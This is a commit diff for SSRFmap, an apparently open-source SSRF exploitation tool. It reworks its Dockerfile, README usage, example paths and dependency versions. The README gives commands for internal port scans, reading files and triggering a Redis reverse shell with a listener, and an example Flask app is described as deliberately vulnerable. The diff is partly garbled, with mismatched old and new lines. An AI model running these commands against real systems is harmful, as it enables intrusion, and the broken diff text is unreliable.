Dockerfile reworked + examples

2024-06-08 20:48:06 +02:00 · 2024-06-08 20:48:06 +02:00 · 7a04c5bb60
parent 3eacb5d729
commit 7a04c5bb60
11 changed files with 72 additions and 48 deletions
--- a/.gitignore
+++ b/.gitignore
@ -104,3 +104,6 @@ venv.bak/
 # mypy
 .mypy_cache/
 # artifacts
 127.0.0.1_5000/
--- a/17
+++ b/17
@ -1,9 +1,14 @@
-FROM python:3-alpine3.10
+FROM python:3.12.4-alpine
-WORKDIR /opt
+WORKDIR /usr/src/app
 COPY . /usr/src/app
-RUN apk update && apk add git
+RUN apk update && apk add curl
 RUN git clone https://github.com/swisskyrepo/SSRFmap.git
 RUN cd /opt/SSRFmap && pip install -r requirements.txt
-ENTRYPOINT ["python3","/opt/SSRFmap/ssrfmap.py"]
+# Install requirements
 RUN pip install -r requirements.txt
 # Downgrade privileges
 USER 1000
 ENTRYPOINT ["python3"]
--- a/README.md
+++ b/README.md
@ -45,37 +45,45 @@ The following modules are already implemented and can be used with the `-m` argu
 ## Install and Manual
-Basic install from the Github repository.
+* From the Github repository.
  ```powershell
  $ git clone https://github.com/swisskyrepo/SSRFmap
  $ cd SSRFmap/
  $ pip3 install -r requirements.txt
  $ python3 ssrfmap.py
-```powershell
+    usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
-$ git clone https://github.com/swisskyrepo/SSRFmap
+                      [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
-$ cd SSRFmap/
+                      [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
 $ pip3 install -r requirements.txt
 $ python3 ssrfmap.py
-  usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
+    optional arguments:
-                    [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
+      -h, --help          show this help message and exit
-                    [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
+      -r REQFILE          SSRF Request file
      -p PARAM            SSRF Parameter to target
      -m MODULES          SSRF Modules to enable
      -l HANDLER          Start an handler for a reverse shell
      -v [VERBOSE]        Enable verbosity
      --lhost LHOST       LHOST reverse shell
      --lport LPORT       LPORT reverse shell
      --uagent USERAGENT  User Agent to use
      --ssl [SSL]         Use HTTPS without verification
      --proxy PROXY       Use HTTP(s) proxy (ex: http://localhost:8080)
      --level [LEVEL]     Level of test to perform (1-5, default: 1)
  ```
 * Docker
  ```powershell
  $ git clone https://github.com/swisskyrepo/SSRFmap
  $ docker build --no-cache -t ssrfmap .
  $ docker run -it ssrfmap ssrfmap.py [OPTIONS] 
  $ docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py
  ```
  optional arguments:
    -h, --help          show this help message and exit
    -r REQFILE          SSRF Request file
    -p PARAM            SSRF Parameter to target
    -m MODULES          SSRF Modules to enable
    -l HANDLER          Start an handler for a reverse shell
    -v [VERBOSE]        Enable verbosity
    --lhost LHOST       LHOST reverse shell
    --lport LPORT       LPORT reverse shell
    --uagent USERAGENT  User Agent to use
    --ssl [SSL]         Use HTTPS without verification
    --proxy PROXY       Use HTTP(s) proxy (ex: http://localhost:8080)
    --level [LEVEL]     Level of test to perform (1-5, default: 1)
 ```
 ## Examples
 First you need a request with a parameter to fuzz, Burp requests works well with SSRFmap. 
-They should look like the following. More examples are available in the **/data** folder.
+They should look like the following. More examples are available in the **./examples** folder.
 ```powershell
 POST /ssrf HTTP/1.1
@ -97,21 +105,21 @@ Use the `-m` followed by module name (separated by a `,` if you want to launch s
 ```powershell
 # Launch a portscan on localhost and read default files
-python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
+python ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan
 ```
 If you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`.
 ```powershell
 # Launch a portscan against an HTTPS endpoint using a custom user-agent
-python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
+python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
 ```
 Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.
 ```powershell
 # Triggering a reverse shell on a Redis
-python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
+python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
 # -l create a listener for reverse shell on the specified port
 # --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
@ -127,10 +135,19 @@ When the target is protected by a WAF or some filters you can try a wide range o
 A quick way to test the framework can be done with `data/example.py` SSRF service.
-```powershell
+* Local
-FLASK_APP=data/example.py flask run &
+  ```powershell
-python ssrfmap.py -r data/request.txt -p url -m readfiles
+  FLASK_APP=examples/example.py flask run &
-```
+  python ssrfmap.py -r examples/request.txt -p url -m readfiles
  ```
 * Docker
  ```ps1
  docker build --no-cache -t ssrfmap .
  docker run -it -v $(pwd):/usr/src/app --name example ssrfmap examples/example.py
  docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles
  ```
 ## Contribute
--- a/examples/example.py
+++ b/examples/example.py
@ -1,9 +1,8 @@
-# NOTE: do not try this at home - highly vulnerable ! (SSRF and RCE)
+# NOTE: Do not try this at home - highly vulnerable ! (SSRF and RCE)
-# NOTE: this file should become a simple ssrf example in order to test SSRFmap
+# NOTE: SSRF examples script
 # FLASK_APP=example.py flask run
-from flask import Flask, abort, request 
+from flask import Flask, request 
 import json
 import re
 import subprocess
--- a/examples/request.txt
+++ b/examples/request.txt
--- a/examples/request2.txt
+++ b/examples/request2.txt
--- a/examples/request3.txt
+++ b/examples/request3.txt
--- a/examples/request4.txt
+++ b/examples/request4.txt
--- a/examples/request5.txt
+++ b/examples/request5.txt
--- a/requirements.txt
+++ b/requirements.txt
@ -1,2 +1,2 @@
-Flask==2.3.2
+Flask==3.0.3
-requests==2.21.0
+requests==2.31.0
--- a/ssrfmap.py
+++ b/ssrfmap.py
@ -17,11 +17,11 @@ def display_banner():
 def parse_args():
    example_text = '''Examples:
-    python ssrfmap.py -r data/request2.txt -p url -m portscan
+    python ssrfmap.py -r examples/request2.txt -p url -m portscan
-    python ssrfmap.py -r data/request.txt -p url -m redis
+    python ssrfmap.py -r examples/request.txt -p url -m redis
-    python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
+    python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
-    python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
+    python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
-    python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles 
+    python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles 
    '''
    parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
`@ -1,2 +1,2 @@`
	`Flask==2.3.2`	`Flask==3.0.3`
	`requests==2.21.0`	`requests==2.31.0`